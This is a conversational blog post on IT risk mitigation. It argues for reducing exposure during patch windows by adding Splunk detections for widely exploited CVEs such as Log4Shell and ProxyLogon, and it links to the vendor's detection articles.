Risk Mitigation

Let’s take a minute and talk about risk mitigation for a little bit today. Specifically, Reduction, as one of the four types of Risk Mitigation techniques (avoidance, reduction, transference, and acceptance). Well, we might as well get the other three out of the way so we can focus on where we need to focus.

Avoidance. Operating an IT system is inherently risky at the end of the day. Avoiding risk is, saying “No” to everything, which is seldom the right answer. Ok. How about saying “No” is the easy answer. My boss didn’t appoint me as a DAO for easy answers. He certainly didn’t appoint me as a DAO to turn off the world. An IT system that doesn’t work is secure, but how useful is it? We’re not here for easy, so let’s set aside avoidance as a strategy.

Transference. This is the most common way to deal with risk and I will say that everyone reading this does it, whether you know it or not. The only function that can accept risk for an information system is the AO function. Not the Program Manager. Not the ISSM. Not the SysAdmin. Only the AO is responsible for the risk to operate an information system. If there are unpatched vulnerabilities on a system, the AO is the one accepting the risk. Whether they know it or not. Whether they have been told about it or not. The AO is the one getting stuck with the short straw. When you think you are accepting risk, you are actually transferring it your AO. You’re just not telling them about it.

Acceptance. Nothing like throwing your hands in the air and giving up. Again, not the most helpful strategy. The PM and the AO had better have a long and thoughtful conversation about this situation. Whatever is happening had better be so bleeding mission critical that doing nothing about it, is the right answer. I’m not saying that there are not cases where risk should be accepted. I’m saying that Accepting risk should not be the default, go-to answer for everything. People need to understand that it is the AO accepting the risk. The AO is the one that will be testifying to Congress. If there is Risk to be accepted, the AO had better have an understanding of what they are accepting and why.

Reduction. While we’re not eliminating the risk, we’re trying to make things a little bit better. That’s where I want to lean in today. Looking back, I think this is the place where we can make a significant impact to our systems. While we can probably apply effort to reduce our risk across the board or at least in multiple families of controls in cyber, the one that we will use as a starting point is Flaw Remediation, SI-2.

Let me come clean with you right now. This isn’t in the JSIG. This isn’t in the NIST 800-53, rev whatever. This is Cyber Security 350 stuff, maybe even Cyber Security 560 or 680. We’re talking about some advanced concepts. We’re thinking about things that are outside the box. The point is, this topic isn’t in the book someplace.

I’m starting with the assumption that you have a well-oiled, centrally managed, flaw remediation plan that you’re collecting metrics on. You understand how long it takes you to deploy patches and updates. You’ve already taken some time, looked at your process for improvement and made some of those improvements. You’re already deploying OS, application, and third party patches and updates on the regular. I’m assuming that you’ve done all of this already and you are still looking for a way to make your system better. You’ve looked at your flaw remediation and configuration management processes and flogged them within a hair of operating like a sewing machine. There’s nothing left to optimize. I’m also assuming that you are using SPLUNK as your audit reduction tool. Yes, there are a ton of alternatives. A lot of you use SPLUNK, so it seems like a decent place to start.

If we follow the JSIG, flaw remediation on our systems occurs within 30 days of the security patch becoming available (SI-2.c for those of you playing the home game). Which, I’ll be honest. If you are able to regularly identify, test, deploy and confirm a security patch has been correctly applied within 45 days of being released, you deserve a medal. That’s some hard work and you deserve a job well done.

If you think you’re in the 30 day club because you follow a Scan-Patch-Scan methodology; you don’t have a process. You’re just doing what an application tells you to do.
I said what I said

Remember this is a Cyber 350 class. We’re applying ConMon here and trying to make our process better; looking at ways of increasing the effectiveness of our processes. During that 30 days window our system is Vulnerable to an identified flaw. Even if our system is not connected to the Internet, there is still a Threat to our system being exploited either by removable media or a malicious insider.

See what I did there? Vulnerability. Threat. Risk. Countermeasure.

So, what is the Countermeasure to the Risk? Apply the patch sooner, right? Drop everything and deploy security updates as soon as they are available from the vendor. There’s probably a place for that. What’s the cost associated with methodology? I think we agree that you would all but need a dedicated staff to just security patches and updates. Pretty much a connection to the Internet and lack of regard for IT or business operations. All in the hopes of eliminating the risk. How feasible is that? How expensive is that Countermeasure? Dropping everything and surging may work for a one off, but as a repeatable process?

Doing it more or more gooder isn’t possible. The cost of the Countermeasure starts to get too great based on the Threat and Vulnerability. At least not realistically or in a repeatable manner. As a one off. Sure. We’ve proven that we can do that, but it’s not sustainable. How can we reduce the risk to our information systems during and after our flaw remediation process? That was the point of the first assumption that we were accepting right? We’ve already executed ConMon on our Flaw Remediation process and gotten as good as we can.

If we are worried about an adversary exploiting a vulnerability on our systems we can also take the step of disconnecting or turning off the affected systems. We can also look at stopping file transfers to/from the system in question. That’s AN approach. I would argue that these courses of action do not reduce our risk, but avoid it. Maybe there is a time and place for it, but for normal day-to-day saying “No” isn’t the right answer.

What if we had a way that we could tell or even notified that our system was being exploited by a given vulnerability? Would that have an impact on our risk of unresolved flaws or unpatched security vulnerabilities? I think that would be a more palatable Countermeasure then disconnecting our systems or stopping media transfers every time until a Critical vulnerability can be patched.

Like any other Countermeasure, there is a cost associated with this. We need to make sure that we are applying this with a determined effort. With that in mind. I think a reasonable starting point would be if we looked at the most commonly exploited CVEs in the wild right now. Fair?

CISA posted a list of the 15 Most Commonly Exploited CVEs. Makes our life a little bit easier for us, huh? Hit the link for the details. Here’s the TLDR: Log4Shell, ProxyLogon, ProxyShell, and CVE-2021-26084 for Atlassian. Those four attacks account for CISA’s top 15 CVEs.

If only there was some way to find out if our system was being exploited by one of these vulnerabilities. Funny you mention that. Remember our second assumption? We’re using SPLUNK as our ART. Let’s use some Google-Fu and search for Log4Shell site:splunk.com. If you didn’t know. Using the site: command in Google limits the search to a specific website. Effectively, we’re searching splunk.com for every instance of Log4Shell.

There’s a reason we’re starting with SPLUNK. Remember our second lens of Cybersecurity “What’s in it for me?” Well, SPLUNK was really easy to write this for. So.

Here’s some Inception level Google-Fu. I googled the Google Command Cheat Sheet for you.

The second article is exactly what we are looking for. Splunk the hard work for us. At the bottom is the search criteria that we need. That’s it. Add this to your dashboard, your alerts and you have a fighting chance of identifying if Log4Shell is being exploited. I’ll leave it to you to repeat the steps for the remaining three. You will find much of the same. Yes. It’s not that easy, but it’s pretty close. It’s a lot easier than asking someone to research and test these exploits themselves and identify the indicators of compromise.

What about the rest? Well, here you go:

CVE-2021-44228 site:splunk.com – second article

https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html

ProxyLogon site:splunk.com – First Article

https://www.splunk.com/en_us/blog/security/detecting-hafnium-exchange-server-zero-day-activity-in-splunk.html

ProxyShell site:splunk.com – Second Article

https://research.splunk.com/endpoint/8c14eeee-2af1-4a4b-bda8-228da0f4862a/

CVE-2021-26084 site:splunk.com – First Article

https://www.splunk.com/en_us/blog/security/atlassian-confluence-vulnerability-cve-2022-26134.html

This is a great start. We can do better. We can always do better. Our first lens of cybersecurity after all is “Why do we do what we do?” What do we do 30 days after CISA updates their list? What if I’m really worried about someone renaming PSEXEC? Come on. Did you honestly expect that would leave it there? Splunk hooks us up with their Detection List. They have a metric crap ton of articles in their library. Something else, I wanted to point out. There is also a data set that you can use to test your ART and verify it is configured correctly. We all know my thoughts on testing your ART. Filter, search it to your heart’s content. Find what matters or is critical to your system.

For the record. A metric crap ton is different from an English crap ton. However, a butt load is a real term of measurement. It’s 126 gallons of wine and has to do with how much wine would fit into a cart. There’s also an alternative measurement of – you know what… Just look it up yourself.

The most risk adverse way to do this would be to add all of these to our SPLUNK dashboard and imagine all of the Risk that we’ve just Mitigated. I’m not sure that it works that way. Every Countermeasure has a cost. I would apply this particular Countermeasure to only those places where it makes sense. I’m of the opinion that this is a case of if everything is important, then nothing is important. CISA’s top 15 list is a reasonable place to start. Based on your system there may another couple on that list that make sense or that could help Reduce some Risk. Want to blow some people’s minds. Have this discussion with your SCA or AO.

What if you don’t use Atlassian on your network? Add it anyway. If it pops an alert, you know something is really wrong. Like someone installed an app that you didn’t know about. Maybe you add it now, and at a later date you add Atlassian. What if you’ve already applied the patches for Log4Shell? Leave the alerts in place anyways. Even if you are completely, totally, stone cold, lead pipe lock sure all your systems are patched. Mistakes happen. It wouldn’t be the first time a system was missed. You still have a degree of risk reduction. What if you deployed a new system and your CM process wasn’t followed and a vulnerable version of the application wasn’t actually removed like it was supposed to be? The point is that there are a lot of reasons and ways that this can make a nice safety net.

I know what some of you are thinking. I am not advocating that everyone drop an English crap ton of cash on SPLUNK. I’m just using it as an example. Like I said, I know a lot of sites use SPLUNK. You may even be saying “But, Dave, I don’t use SPLUNK”. First off. Don’t call me But Dave. Secondly, And? Use some Google-fu and find out if your ART vendor has something similar. It also took me about 10 minutes to find these examples using Google.

As we end our time together, let’s pull this discussion back up out of the weeds because that is not the point of this exercise. This was merely an example that is easy to see and digest. This is just one way; one area that we could try and mitigate risk. The real question is what are other areas of risk in your system? What methods have we looked at; what questions have we asked about trying to reduce that risk. How can you mitigate the risk to using open source or high risk software? Folks are really excited about the STIGS. How can you mitigate the risk of not implementing a STIG recommended setting? For something that matters, how can you reduce the risk of that open POA&M finding?

Share this: